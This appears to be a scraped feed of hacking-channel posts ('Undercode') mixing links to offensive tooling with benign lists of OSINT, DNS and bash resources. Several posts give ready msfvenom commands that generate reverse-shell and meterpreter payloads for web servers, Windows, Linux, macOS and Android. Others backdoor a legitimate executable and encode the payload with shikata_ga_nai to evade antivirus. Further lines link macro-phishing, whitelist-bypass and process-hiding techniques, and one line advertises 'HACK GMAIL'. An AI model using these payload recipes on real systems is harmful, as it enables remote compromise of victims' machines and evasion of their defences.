▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Exploits & #Bugs New :


[Exploiting CVE-2017-0199: HTA Handler Vulnerability](https://www.mdsec.co.uk/2017/04/exploiting-cve-2017-0199-hta-handler-vulnerability/)

CVE-2017-0199 Toolkit


[Window Signed Binary](https://github.com/vysec/Windows-SignedBinary)

Wepwnise

[Bash Bunny](https://hakshop.com/products/bash-bunny)

Generate Macro - Tool

[How To: Empiresa Cross Platform Office Macro](https://www.blackhillsinfosec.com/empires-cross-platform-office-macro/)

Excel macros with PowerShell

[PowerPoint and Custom Actions](https://phishme.com/powerpoint-and-custom-actions/)

MS Signed mimikatz in just 3 steps

[Hiding your process from sysinternals](https://riscybusiness.wordpress.com/2017/10/07/hiding-your-process-from-sysinternals/)

Luckystrike: An Evil Office Document Generator

[The Absurdly Underestimated Dangers of CSV Injection](http://georgemauer.net/2017/10/07/csv-injection.html)

Macro-less Code Exec in MSWord

[Multi-Platform Macro Phishing Payloads](https://medium.com/@malcomvetter/multi-platform-macro-phishing-payloads-3b688e8eff68)

Macroless DOC malware that avoids detection with Yara rule

[Empire without powershell](https://bneg.io/2017/07/26/empire-without-powershell-exe/)

Powershell without Powershell to bypass app whitelist/

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

SUPPORT & SHARE :

T.me/UndercodeTesting

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Web #Payloads Commands Metasploit



1️⃣msfvenom -p php/meterpreter_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.php

2️⃣ Creates a Simple TCP Shell for PHP

3️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f asp > example.asp

4️⃣Creates a Simple TCP Shell for ASP

5️⃣msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f raw > example.jsp

6️⃣ Creates a Simple TCP Shell for Javascript

7️⃣ msfvenom -p java/jsp_shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f war > example.war`

8️⃣ Creates a Simple TCP Shell for WAR

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Open Source #Threat Intelligence

- GOSINT - a project used for collecting, processing, and exporting high quality indicators of compromise (IOCs). GOSINT allows a security analyst to collect and standardize structured and unstructured threat intelligence.

- Awesome Threat Intelligence - A curated list of awesome Threat Intelligence resources. This is a great resource and I try to contribute to it.


▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 IP address and DNS #Lookup Tools 2020 :

- bgp

- Bgpview

- DataSploit (IP Address Modules)

- Domain Dossier

- Domaintoipconverter

- Googleapps Dig

- Hurricane Electric BGP Toolkit

- ICANN Whois

- Massdns

- Mxtoolbox

- Ultratools ipv6Info

- Viewdns

- Umbrella (OpenDNS) Popularity List

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 Public Pen Testing Reports recommended :

> The following are several resources that are useful when writing penetration testing reports, including many different examples:


1️⃣Curated List of penetration testing reports | https://
github.com/santosomar/public-pentesting-reports (forked from https://github.com/juliocesarfort/public-pentesting-reports) |

2️⃣ SANS guidance on writing penetration testing reports | https://www.sans.org/reading-room/whitepapers/bestprac/writing-penetration-testing-report-33343 |

3️⃣ Offensive Security example |https://www.offensive-security.com/reports/sample-penetration-testing-report.pdf |

4️⃣ PCI Security report guidance | https://www.pcisecuritystandards.org/documents/Penetration_Testing_Guidance_March_2015.pdf |

5️⃣ Dradis Framework | https://dradisframework.com/ce/ |

> git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑Creating Binaries with metasploit :

1) - msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

2) - Creates a simple TCP Payload for Windows
- msfvenom -p windows/meterpreter/reverse_http LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

3) - Creates a simple HTTP Payload for Windows
- msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f elf > example.elf

4) - Creates a simple TCP Shell for Linux

5) - msfvenom -p osx/x86/shell_reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f macho > example.macho

6) - Creates a simple TCP Shell for Mac

7) - msfvenom -p android/meterpreter/reverse/tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} R > example.apk

8) - Creates a simple TCP Payload for Android


@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Shell Script Development :

- ansi - ANSI escape codes in pure bash

- change text color, position the cursor, much more

- argbash - Bash argument parsing code generator

- assert.sh - Bash unit testing framework

- BashScriptTestingLibrary - A unit testing framework for Bash scripts

- bash3boilerplate - Templates to write better Bash scripts

- bashful - A collection of libraries to simplify writing Bash scripts

- bashmanager - mini bash framework for creating command line tools

- bats - Bash Automated Testing System

- bash_unit - bash unit testing enterprise edition framework for professionals

- mo - Mustache templates in pure bash

- semver_bash - Semantic Versioning in Bash

- shfmt - Format bash programs

- shunit2 - A unit test framework for
Bash scripts with a flavour of JUnit/PyUnit

- bashing - Smashing Bash into Pieces

- Bash framework for creating command line tools

- shellcheck - ShellCheck, a static analysis tool for shell scripts

>git sources
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

2020 Verified Cve SpotOutlook Crash 100/100

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Android Security Editing 2020 resources :

- Android Developer Studio

- APKtool

- dex2jar

- Bytecode Viewer

- IDA Pro

- Android Reverse Engineering Arsenals

@UndercodeSecurity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑#Android Security Editing 2020 resources :

- Android Developer Studio

- APKtool

- dex2jar

- Bytecode Viewer

- IDA Pro

- Android Reverse Engineering Arsenals

@UndercodeSecurity
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

> HACK GMAIL
> JAVASCRIPT TUT
> IMAGES
>ICMP
>AND KERNEL TUTORIALS PDFS 🦑

▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑How to Create Windows Payload :

> Windows #Payloads

1️⃣- msfvenom -l encoders

2️⃣ - Lists all avalaible encoders

3️⃣- msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -f exe > example.exe

4️⃣ - Binds an exe with a Payload (Backdoors an exe)
-
5️⃣ msfvenom -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -b ‘\x00’ -i 3 -f exe > example.exe

6️⃣- Creates a simple TCP payload with shikata_ga_nai encoder

7️⃣- msfvenom -x base.exe -k -p windows/meterpreter/reverse_tcp LHOST={DNS / IP / VPS IP} LPORT={PORT / Forwarded PORT} -e x86/shikata_ga_nai -i 3 -b “\x00” -f exe > example.exe

8️⃣ - Binds an exe with a Payload and encodes it

@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
▁ ▂ ▄ ｕ𝕟𝔻Ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁